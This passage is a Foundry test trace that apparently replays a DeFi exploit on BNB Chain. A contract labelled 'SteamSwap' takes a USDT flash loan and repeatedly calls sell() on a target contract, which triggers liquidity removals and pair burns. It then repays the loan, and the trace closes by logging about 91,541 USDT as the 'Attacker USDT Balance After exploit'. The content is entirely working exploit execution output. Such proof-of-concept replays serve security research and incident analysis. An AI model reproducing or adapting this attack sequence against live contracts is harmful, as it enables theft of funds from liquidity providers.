    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 29202121658691686368413 [2.92e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbf8afd9434f7b858f55f76b048eab4533a0e3063633a55301dfa3d01f28c6cc0: 0x0000000000000000000000000000000000000000000006aca8ce77697d793543 → 0x00000000000000000000000000000000000000000000007d9bf5664db2a330a6
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000018a398a1e9c8fdc123054 → 0x00000000000000000000000000000000000000000001906896f7adaba6e834f1
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 3220708202567089484096 [3.22e21]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2317081010142762447014 [2.317e21]
    │   │   │   │   │   ├─ emit Sync(reserve0: 3220708202567089484096 [3.22e21], reserve1: 2317081010142762447014 [2.317e21])
    │   │   │   │   │   ├─ emit Burn(sender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, amount0: 40590515543828816609775 [4.059e22], amount1: 29202121658691686368413 [2.92e22], to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000007d40045abc68beb06e9 → 0x000000000000000000000000000000000000000000000093521d27015a98e428
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x000000000000000000000000000000000000000000000740ae2884c5315222c1 → 0
    │   │   │   │   │   │   @ 8: 0x6661f1220000000006aca8ce77697d79354300000000094702dde3890e6db32f → 0x6661f12200000000007d9bf5664db2a330a60000000000ae984e1630fe337140
    │   │   │   │   │   └─ ← [Return] 40590515543828816609775 [4.059e22], 29202121658691686368413 [2.92e22]
    │   │   │   │   └─ ← [Return] 40590515543828816609775 [4.059e22], 29202121658691686368413 [2.92e22]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [60118] 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6::sell(4326240245732101684211 [4.326e21])
    │   │   │   ├─ [4365] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transferFrom(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 4326240245732101684211 [4.326e21])
    │   │   │   │   ├─ emit Transfer(from: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, value: 4326240245732101684211 [4.326e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000001906896f7adaba6e834f1 → 0x000000000000000000000000000000000000000000018f7e1052c7949256b8fe
    │   │   │   │   │   @ 0x015ac9fc116709840380b242812ad3cfa1bf6d68a05fa6139a260157ba46861c: 0x000000000000000000000000000000000000000000064acdd53f86d81ff49a69 → 0x000000000000000000000000000000000000000000064bb85be46cef3486165c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [517] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 3220708202567089484096 [3.22e21], 2317081010142762447014 [2.317e21], 1717694754 [1.717e9]
    │   │   │   ├─ [432] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 2717588307207507207208 [2.717e21]
    │   │   │   ├─ [52360] 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702::removeLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0, 2537015290899930857524 [2.537e21], 0, 0, SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1717694754 [1.717e9])
    │   │   │   │   ├─ [23333] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::transferFrom(0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, 2537015290899930857524 [2.537e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, to: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, value: 2537015290899930857524 [2.537e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0 → 0x0000000000000000000000000000000000000000000000898828ed63f0b0c034
    │   │   │   │   │   │   @ 0x28006f1c78019f3c37312abdc3ff9cddfb701637112f0f5e47e8e1f6815f185e: 0x000000000000000000000000000000000000000000000093521d27015a98e040 → 0x000000000000000000000000000000000000000000000009c9f4399d69e8200c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [26416] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::burn(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 3220708202567089484096 [3.22e21]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2317081010142762447014 [2.317e21]
    │   │   │   │   │   ├─ [338] 0xF429BE07D1BA18DCd48AF91423c2f075b30F7E50::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: 0x0000000000000000000000000000000000000000, value: 2537015290899930857524 [2.537e21])
    │   │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3006704855098430859983 [3.006e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3006704855098430859983 [3.006e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x0000000000000000000000000000000000000000000000ae984e1630fe337140 → 0x00000000000000000000000000000000000000000000000b99e49eaf35e34671
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000007ca20925217ceb4cbc1a → 0x000000000000000000000000000000000000000000007d45078e98feb39ce6e9
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3857] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2163120122866050842104 [2.163e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2163120122866050842104 [2.163e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbf8afd9434f7b858f55f76b048eab4533a0e3063633a55301dfa3d01f28c6cc0: 0x00000000000000000000000000000000000000000000007d9bf5664db2a330a6 → 0x00000000000000000000000000000000000000000000000858a2f342285a72ae
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000018f7e1052c7949256b8fe → 0x000000000000000000000000000000000000000000018ff353a53aa01c9f76f6
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 214003347468658624113 [2.14e20]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 153960887276711604910 [1.539e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 214003347468658624113 [2.14e20], reserve1: 153960887276711604910 [1.539e20])
    │   │   │   │   │   ├─ emit Burn(sender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, amount0: 3006704855098430859983 [3.006e21], amount1: 2163120122866050842104 [2.163e21], to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x0000000000000000000000000000000000000000000000898828ed63f0b0c034 → 0
    │   │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000000093521d27015a98e428 → 0x000000000000000000000000000000000000000000000009c9f4399d69e823f4
    │   │   │   │   │   │   @ 8: 0x6661f12200000000007d9bf5664db2a330a60000000000ae984e1630fe337140 → 0x6661f12200000000000858a2f342285a72ae00000000000b99e49eaf35e34671
    │   │   │   │   │   └─ ← [Return] 3006704855098430859983 [3.006e21], 2163120122866050842104 [2.163e21]
    │   │   │   │   └─ ← [Return] 3006704855098430859983 [3.006e21], 2163120122866050842104 [2.163e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [60118] 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6::sell(32046224042460012475 [3.204e19])
    │   │   │   ├─ [4365] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transferFrom(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 32046224042460012475 [3.204e19])
    │   │   │   │   ├─ emit Transfer(from: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, value: 32046224042460012475 [3.204e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000018ff353a53aa01c9f76f6 → 0x000000000000000000000000000000000000000000018ff196ea2ba5a136173b
    │   │   │   │   │   @ 0x015ac9fc116709840380b242812ad3cfa1bf6d68a05fa6139a260157ba46861c: 0x000000000000000000000000000000000000000000064bb85be46cef3486165c → 0x000000000000000000000000000000000000000000064bba189f7be9afef7617
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [517] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 214003347468658624113 [2.14e20], 153960887276711604910 [1.539e20], 1717694754 [1.717e9]
    │   │   │   ├─ [432] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 180573016307576349684 [1.805e20]
    │   │   │   ├─ [52360] 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702::removeLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0, 18792705858518006351 [1.879e19], 0, 0, SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1717694754 [1.717e9])
    │   │   │   │   ├─ [23333] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::transferFrom(0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, 18792705858518006351 [1.879e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, to: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, value: 18792705858518006351 [1.879e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0 → 0x00000000000000000000000000000000000000000000000104cd1a69095e3a4f
    │   │   │   │   │   │   @ 0x28006f1c78019f3c37312abdc3ff9cddfb701637112f0f5e47e8e1f6815f185e: 0x000000000000000000000000000000000000000000000009c9f4399d69e8200c → 0x000000000000000000000000000000000000000000000008c5271f346089e5bd
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [26416] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::burn(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 214003347468658624113 [2.14e20]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 153960887276711604910 [1.539e20]
    │   │   │   │   │   ├─ [338] 0xF429BE07D1BA18DCd48AF91423c2f075b30F7E50::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: 0x0000000000000000000000000000000000000000, value: 18792705858518006351 [1.879e19])
    │   │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 22271887815543932295 [2.227e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 22271887815543932295 [2.227e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x00000000000000000000000000000000000000000000000b99e49eaf35e34671 → 0x00000000000000000000000000000000000000000000000a64cefab7bb0a80ea
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000007d45078e98feb39ce6e9 → 0x000000000000000000000000000000000000000000007d463ca43cf62e75ac70
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3857] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 16023112021230006237 [1.602e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 16023112021230006237 [1.602e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbf8afd9434f7b858f55f76b048eab4533a0e3063633a55301dfa3d01f28c6cc0: 0x00000000000000000000000000000000000000000000000858a2f342285a72ae → 0x0000000000000000000000000000000000000000000000077a456bc4eaa5c2d1
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000018ff196ea2ba5a136173b → 0x000000000000000000000000000000000000000000018ff27547b322deeac718
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 191731459653114691818 [1.917e20]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 137937775255481598673 [1.379e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 191731459653114691818 [1.917e20], reserve1: 137937775255481598673 [1.379e20])
    │   │   │   │   │   ├─ emit Burn(sender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, amount0: 22271887815543932295 [2.227e19], amount1: 16023112021230006237 [1.602e19], to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x6661f12200000000000858a2f342285a72ae00000000000b99e49eaf35e34671 → 0x6661f1220000000000077a456bc4eaa5c2d100000000000a64cefab7bb0a80ea
    │   │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000000009c9f4399d69e823f4 → 0x000000000000000000000000000000000000000000000008c5271f346089e9a5
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x00000000000000000000000000000000000000000000000104cd1a69095e3a4f → 0
    │   │   │   │   │   └─ ← [Return] 22271887815543932295 [2.227e19], 16023112021230006237 [1.602e19]
    │   │   │   │   └─ ← [Return] 22271887815543932295 [2.227e19], 16023112021230006237 [1.602e19]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x92b7807bF19b7DDdf89b706143896d05228f3121, 500050000000000000000000 [5e23])
    │   │   │   ├─ emit Transfer(from: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x92b7807bF19b7DDdf89b706143896d05228f3121, value: 500050000000000000000000 [5e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x554fd3ef8b49f01dc63957408fd93bb26c62062a1025c95e3110e2975a20352a: 0x0000000000000000000000000000000000000000000d6064306eed858921ed18 → 0x0000000000000000000000000000000000000000000dca47f43a03130b29ed18
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000007d463ca43cf62e75ac70 → 0x00000000000000000000000000000000000000000000136278d92768ac6dac70
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x92b7807bF19b7DDdf89b706143896d05228f3121) [staticcall]
    │   │   └─ ← [Return] 16671281001740955212705048 [1.667e25]
    │   ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x92b7807bF19b7DDdf89b706143896d05228f3121) [staticcall]
    │   │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x92b7807bF19b7DDdf89b706143896d05228f3121) [delegatecall]
    │   │   │   └─ ← [Return] 7135542802228066553357626 [7.135e24]
    │   │   └─ ← [Return] 7135542802228066553357626 [7.135e24]
    │   ├─ emit Flash(param0: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 500000000000000000000000 [5e23], param3: 0, param4: 50000000000000000000 [5e19], param5: 0)
    │   ├─  storage changes:
    │   │   @ 4: 0x000000000000000f8bb6dae1a41ce0540000000000000015c6c6d94a3e7a37c5 → 0x000000000000000f8bb6dae1a41ce0540000000000000016abc29fde886c37c5
    │   │   @ 2: 0x0000000000000000000000000000000000019455f826e01d57b5feb4a4914bef → 0x000000000000000000000000000000000001945c4dd094027be454ac862f224d
    │   └─ ← [Stop]
    ├─ [1081] 0x55d398326f99059fF775485246999027B3197955::symbol() [staticcall]
    │   └─ ← [Return] "USDT"
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 91541452128431815634032 [9.154e22]
    ├─ [425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDT Balance After exploit", val: 91541452128431815634032 [9.154e22], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x000000000000000000000000000000000000000000000000000000000ce40ce4 → 0x000000000000000000000000000000000000000000000000000000010ce40ce4
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.36s (9.83s CPU time)

Ran 2 test suites in 11.41s (11.96s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
